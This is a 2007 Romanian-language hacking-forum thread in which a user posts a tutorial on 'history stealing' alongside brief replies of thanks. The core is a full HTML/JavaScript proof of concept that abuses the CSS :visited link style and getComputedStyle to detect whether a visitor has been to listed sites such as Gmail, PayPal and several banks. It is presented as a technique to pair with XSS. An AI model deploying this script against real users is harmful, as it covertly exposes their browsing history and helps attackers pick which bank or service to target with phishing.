History Stealing din JS

michee · November 18, 2007

Probabil ca unii stiu deja, membrii VIP si cei care au cedit cartea XSS atacks 2007.....de acolo am luat acest tutorial si m-am gandit sa-l postez si sa explic. Merge mana in mana cu XSS-ul deci


<html>
<body>
<H3>Visited</H3>
<ul id="visited">[/list]
<H3>Not Visited</H3>
<ul id="notvisited">[/list]
<script>
/* Aici creez o lista de site-uri pe care vreau sa stiu daca au fost vizitate sau nu de catre user-ul respectiv */
var websites = [
"http://ha.ckers.org",
"http://jeremiahgrossman.blogspot.com/",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://www.e-gold.com/",
"http://www.amazon.com/",
"http://www.bankofamerica.com/",
"http://www.whitehatsec.com/",
"http://www.bofa.com/",
"http://www.citibank.com/",
"http://www.paypal.com/",
];
/*  Parcurg array-ul websites */
for (var i = 0; i < websites.length; i++) {
/* Creez un link cu un id unic ptr fiecare website in parte*/
var link = document.createElement("a");
link.id = "id" + i;
link.href = websites[i];
link.innerHTML = websites[i];

/*  Deci cum am zis mai sus fiecare link are un id unic. Ptr fiecare id 
creez un stil  in cazul in care link-ul respectiv a fost vizitat.   Acest fapt necesita cunostinte minime de css dupa cum stiti un link poate avea starile  
link, visited,hover si active .

*/
document.write('<style>');
document.write('#id' + i + ":visited {color: #FF0000;}");
document.write('</style>');
/*  Adaug link-ul in DOM si apoi ii dau remove.  Aici este smecheria. Browserul afiseaza un link in culori diferite dupa cum a fost vizitat sau nu.

*/
document.body.appendChild(link);
var color =
document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
document.body.removeChild(link);
/* Folosind  functia   document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
Pot analiza cum imi afiseaza mie browser-ul link-ul respectiv.
*/
if (color == "rgb(255, 0, 0)") { // visited
/*  Daca functia imi intoarce aceeasi culoare cu cea pe care am setat-o eu mai sus ptr stilul vizitat inseamna ca site-ul a fost vizitat */
var item = document.createElement('li');
item.appendChild(link);
document.getElementById('visited').appendChild(item);
} else { // not visited
/* altfel nu a fost vizitat */
var item = document.createElement('li');
item.appendChild(link);
document.getElementById('notvisited').appendChild(item);
} 
} 
</script>
</body>
</html>

Cum am zis creditele se duc la autorii cartii respective. Daca nu am fost destul de clar in explicatii astepta intrebari. Si mai usor cu flame-urile ca e primu meu tutorial, sper sa ajute pe careva.

November 18, 2007

Interesant.

michee · November 18, 2007

daca va purtati frumos, promit ca va mai dau ceva si maine:P

moubik · November 18, 2007

multumesc, stiam de tehnica dar nu am vazut nici un poc pana acum.

Imperfect · November 19, 2007

Mersi , interesant.

michee · November 19, 2007

Np.

@moubik

eh, ai vazut acuma.

Sign In

History Stealing din JS

Recommended Posts

michee

Link to comment

Share on other sites

Guest Nemessis

Link to comment

Share on other sites

michee

Link to comment

Share on other sites

moubik

Link to comment

Share on other sites

Imperfect

Link to comment

Share on other sites

michee

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages